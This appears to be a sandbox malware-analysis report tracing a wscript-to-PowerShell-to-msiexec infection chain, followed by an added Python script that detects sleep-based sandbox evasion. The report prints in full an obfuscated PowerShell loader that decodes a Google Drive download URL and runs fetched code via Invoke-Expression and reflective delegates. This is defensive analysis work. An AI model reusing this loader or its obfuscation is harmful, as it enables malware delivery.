Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneo", "0")
Source: Yara match File source: 00000006.00000002.1750338876.000000000D2B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1739244674.00000000086B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hucksterise42 $snoende $Catholicising), (Ophoejede @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Independentism = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cetiosauria)), $Udregnendes).DefineDynamicModule($Unguilefulness, $false).DefineType($Brrups, $Phoh, [System.MulticastDelegate])$Sejlk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3D7CAA push eax; ret 3_2_00007FFAAC3D7CB9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043891E pushad ; iretd 8_2_0043891F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00438C2F pushfd ; iretd 8_2_00438C30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00438DDF push esp; iretd 8_2_00438DE0
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (87 identical entries)
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX (56 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (INT64_MAX / 10000 ms, i.e. the largest relative timeout NtDelayExecution accepts: effectively an infinite wait)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time (51 successive calls, each roughly 110 ms shorter than the previous one): 600000, 599875, 599766, 599656, 599545, 599433, 599328, 599219, 599094, 598984, 598875, 598764, 598651, 598546, 598426, 598297, 598187, 598074, 597969, 597844, 597734, 597625, 597516, 597405, 597297, 597187, 597077, 596969, 596859, 596747, 596631, 596500, 596389, 596280, 596162, 596016, 595891, 595781, 595656, 595547, 595437, 595326, 595219, 595109, 594988, 594859, 594743, 594625, 594515, 594406, 594293
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6396
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3703
Source: C:\Windows\System32\wscript.exe TID: 7508 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916 Thread sleep count: 3182 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916 Thread sleep count: 6658 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time (51 successive calls, each >= -30000s): -600000s, -599875s, -599766s, -599656s, -599545s, -599433s, -599328s, -599219s, -599094s, -598984s, -598875s, -598764s, -598651s, -598546s, -598426s, -598297s, -598187s, -598074s, -597969s, -597844s, -597734s, -597625s, -597516s, -597405s, -597297s, -597187s, -597077s, -596969s, -596859s, -596747s, -596631s, -596500s, -596389s, -596280s, -596162s, -596016s, -595891s, -595781s, -595656s, -595547s, -595437s, -595326s, -595219s, -595109s, -594988s, -594859s, -594743s, -594625s, -594515s, -594406s, -594293s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
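Two things in the sleep entries above are worth checking by hand rather than taking at face value. First, the values are milliseconds despite the "s" suffix the report prints (600000 is a ten-minute sleep, which is what the "Contains long sleeps (>= 3 min)" signature keys on), and 922337203685477 is INT64_MAX / 10000, the largest relative timeout NtDelayExecution can express. Second, the per-thread "Thread sleep time" totals are exact multiples of that maximum: -922337203685477s for TID 7824 is one maximal sleep, -4611686018427385s for TID 8148 is five, and -29514790517935264s for TID 6912 is thirty-two, which matches the "Thread sleep count: 32 > 30" line for the same thread. The run of decreasing delays (600000, 599875, 599766, ...) is consistent with a loop that re-sleeps for the time left until a deadline: when the sandbox skips the sleep, only the loop's own overhead (about 110 ms here) elapses, so each request is slightly shorter than the last. By contrast, the NOOPENFILEERRORBOX entries record SetErrorMode(SEM_NOOPENFILEERRORBOX), which merely suppresses the file-open error dialog; powershell.exe sets it in this very trace and so do many benign programs, so it is context rather than a detection on its own.

The following Python is an added example and is not part of the Joe Sandbox report or of any vendor tooling. It parses report lines of the shape shown on this page (the sample lines embedded below are a subset copied from the report), decomposes per-thread sleep totals into the number of maximal sleeps, and flags countdown sleep loops. The function names, the thresholds `min_len` and `max_step_ms`, and the verdict wording are mine.

```python
"""Parse sandbox 'Thread delayed' / 'Thread sleep time' lines and flag
sleep-based evasion.  Added example: the line format mirrors the Joe Sandbox
report above, but the function names, thresholds and verdicts are the
author's own assumptions, not part of the report or of any vendor tool."""
import re
from collections import defaultdict

# Largest relative timeout NtDelayExecution/Sleep can express:
# 0x7FFFFFFFFFFFFFFF 100-ns ticks, converted to milliseconds.
INT64_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477

# "Thread delayed: delay time: <ms>" and "TID: <n> Thread sleep time: -<ms>s"
# (the report prints 's', but the values are milliseconds).
DELAY_RE = re.compile(
    r"Source: (?P<proc>\S+) Thread delayed: delay time: (?P<ms>\d+)")
SLEEP_RE = re.compile(
    r"Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")

# Sample input: a subset of lines copied from the report on this page.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599875
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599656
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599545
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599433
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599328
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599219
""".strip().splitlines()


def parse(lines):
    """Return (proc, tid, ms) tuples; tid is None for 'Thread delayed' lines."""
    events = []
    for line in lines:
        m = SLEEP_RE.search(line)
        if m:
            events.append((m["proc"], int(m["tid"]), int(m["ms"])))
            continue
        m = DELAY_RE.search(line)
        if m:
            events.append((m["proc"], None, int(m["ms"])))
    return events


def max_sleep_multiples(events):
    """Per-thread totals that are exact multiples of INT64_MAX_MS map to
    {(proc, tid): n}: the thread issued n sleeps with the maximal interval."""
    out = {}
    for proc, tid, ms in events:
        if tid is not None and ms >= INT64_MAX_MS and ms % INT64_MAX_MS == 0:
            out[(proc, tid)] = ms // INT64_MAX_MS
    return out


def countdown_loops(events, min_len=5, max_step_ms=1000):
    """Find runs of strictly decreasing delays per process with a small step.
    Such a run is consistent with a loop that re-sleeps for the time left until
    a deadline: a sandbox that skips the sleep lets only the loop's own overhead
    elapse, so the requested delay shrinks by roughly that overhead each time.
    Returns (proc, first_ms, last_ms, call_count) per run."""
    runs = []
    per_proc = defaultdict(list)
    for proc, tid, ms in events:
        if tid is None:
            per_proc[proc].append(ms)
    for proc, delays in per_proc.items():
        start = 0
        for i in range(1, len(delays) + 1):
            step = delays[i - 1] - delays[i] if i < len(delays) else None
            if step is None or not (0 < step <= max_step_ms):
                if i - start >= min_len:
                    runs.append((proc, delays[start], delays[i - 1], i - start))
                start = i
    return runs


def analyse(lines):
    """Human-readable findings for a batch of report lines."""
    events = parse(lines)
    findings = []
    for (proc, tid), n in max_sleep_multiples(events).items():
        findings.append(f"{proc} TID {tid}: {n} sleep(s) of INT64_MAX/10000 ms "
                        "(effectively infinite)")
    for proc, first, last, n in countdown_loops(events):
        findings.append(f"{proc}: countdown sleep loop {first} -> {last} ms "
                        f"over {n} calls (re-sleeping until a deadline)")
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LINES):
        print(finding)
```

Run against the sample it reports three threads with maximal sleeps (1, 5 and 32 of them) and one countdown loop for msiexec.exe; feeding it the full set of "Thread delayed" lines from the report yields the same loop with 51 calls. The step threshold is deliberately loose; tighten `max_step_ms` if a target's loop overhead is known.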
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time (36 successive calls): 600000, 599875, 599766, 599656, 599545, 599433, 599328, 599219, 599094, 598984, 598875, 598764, 598651, 598546, 598426, 598297, 598187, 598074, 597969, 597844, 597734, 597625, 597516, 597405, 597297, 597187, 597077, 596969, 596859, 596747, 596631, 596500, 596389, 596280, 596162, 596016
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595219 Jump to behavior
